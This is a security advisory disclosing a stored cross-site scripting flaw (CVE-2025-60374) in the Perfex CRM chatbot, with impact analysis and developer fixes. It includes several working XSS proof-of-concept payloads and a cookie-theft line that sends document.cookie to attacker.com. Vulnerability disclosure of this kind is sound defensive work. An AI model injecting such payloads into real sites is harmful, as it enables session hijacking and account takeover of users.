📄 Perfex CRM Chatbot Cross Site Scripting

# CVE-2025-60374
    CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot
    
    > **⚠️ Security Advisory**  
    > A critical Stored Cross-Site Scripting vulnerability in Perfex CRM's chatbot feature
    
    [![CVE](https://img.shields.io/badge/CVE-2025--60374-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)
    [![Severity](https://img.shields.io/badge/Severity-High-orange)]()
    [![CWE](https://img.shields.io/badge/CWE-79-blue)](https://cwe.mitre.org/data/definitions/79.html)
    
    ---
    
    ## 📋 Overview
    
    A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Perfex CRM's chatbot feature. This vulnerability allows attackers to inject malicious HTML and JavaScript code that gets stored on the server and executed in victims' browsers when they view chat messages.
    
    ## 🎯 Affected Versions
    
    - **Product:** Perfex CRM
    - **Vendor:** Perfex CRM
    - **Vulnerable Versions:** < 3.3.1
    - **Fixed Version:** 3.3.1+
    
    ## 🔍 Vulnerability Details
    
    | Attribute | Value |
    |-----------|-------|
    | **CVE ID** | CVE-2025-60374 |
    | **Type** | Stored Cross-Site Scripting (XSS) |
    | **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
    | **Attack Vector** | Network/Remote |
    | **Authentication** | Required (Low Privilege) |
    | **User Interaction** | None to Minimal |
    | **Discoverer** | Ajansha Shankar |
    
    ### Description
    
    The chatbot's message parameter in Perfex CRM lacks proper input sanitization and output encoding. When users submit messages through the chatbot interface, malicious HTML/JavaScript payloads are stored in the database without adequate filtering and subsequently rendered without proper escaping, leading to code execution in other users' browsers.
    
    ### Root Cause
    
    - ❌ Insufficient input validation on chatbot message parameter
    - ❌ Missing output encoding when rendering stored messages
    - ❌ Session cookies not marked as `HttpOnly`
    - ❌ Lack of Content Security Policy (CSP)
    
    ## 💥 Impact
    
    ### Security Implications
    
    - **🔓 Session Hijacking:** Attackers can steal session tokens via `document.cookie` access
    - **👤 Account Takeover:** Complete compromise of victim accounts
    - **🎭 Privilege Escalation:** Administrator account compromise if admin views malicious message
    - **📊 Data Exfiltration:** Access to sensitive information in user's browser context
    - **🎪 Phishing:** Ability to modify page content and redirect users
    
    ### CIA Triad Assessment
    
    | Factor | Impact | Explanation |
    |--------|--------|-------------|
    | **Confidentiality** | 🔴 HIGH | Session tokens and sensitive data can be stolen |
    | **Integrity** | 🔴 HIGH | Unauthorized actions can be performed as the victim |
    | **Availability** | 🟡 LOW | Limited impact on system availability |
    
    ## 🧪 Proof of Concept
    
    ### PoC 1: Basic Image XSS
    ```html
    <img src=x onerror=alert('XSS executed!')>
    ```
    
    ### PoC 2: Interactive Button XSS
    ```html
    <button onclick=alert('Click executed!')>Click here</button>
    ```
    
    ### PoC 3: Auto-playing Embedded Content
    ```html
    <iframe width="560" height="315" 
    src="https://www.youtube.com/embed/6B2jvf81LxE?playlist=Gvq4d460C1M&autoplay=1" 
    frameborder="0" allow="accelerometer; autoplay; clipboard-write; 
    encrypted-media; gyroscope; picture-in-picture" allowfullscreen>
    </iframe>
    ```
    
    ### PoC 4: Event-based XSS
    ```html
    <meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')>
    2 out of 10
    </meter>
    ```
    
    ### Real-World Attack Scenario
    
    **Cookie Theft Example:**
    ```javascript
    <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
    ```
    
    This payload would send the victim's session cookie to an attacker-controlled server, enabling complete account takeover.
    
    ## 🛡️ Mitigation
    
    ### For End Users
    
    1. **✅ Upgrade Immediately:** Update to Perfex CRM v3.3.1 or later
    2. **🔍 Audit Messages:** Review chatbot history for suspicious HTML/JavaScript content
    3. **🔄 Reset Sessions:** Force all users to re-authenticate after patching
    4. **📝 Monitor Logs:** Check for unusual chatbot activity
    
    ### For Developers
    
    #### Immediate Fixes
    ```php
    // Input Sanitization Example
    $message = htmlspecialchars($input_message, ENT_QUOTES, 'UTF-8');
    
    // Output Encoding Example
    echo htmlspecialchars($stored_message, ENT_QUOTES, 'UTF-8');
    ```
    
    #### Long-term Security Improvements
    
    1. **Content Security Policy (CSP)**
    ```http
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
    ```
    
    2. **HttpOnly Cookies**
    ```php
    setcookie('session', $value, [
        'httponly' => true,
        'secure' => true,
        'samesite' => 'Strict'
    ]);
    ```
    
    3. **Input Validation Library**
    ```php
    // Use DOMPurify, HTML Purifier, or similar
    $clean_html = $purifier->purify($dirty_html);
    ```
    
    ## 📚 References
    
    - [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html)
    - [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/attacks/xss/)
    - [CVE-2025-60374 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)
    
    
    ## 👤 Credits
    
    **Discovered by:** Ajansha Shankar
    
    ## 📧 Contact
    
    For questions or additional information:
    - **LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/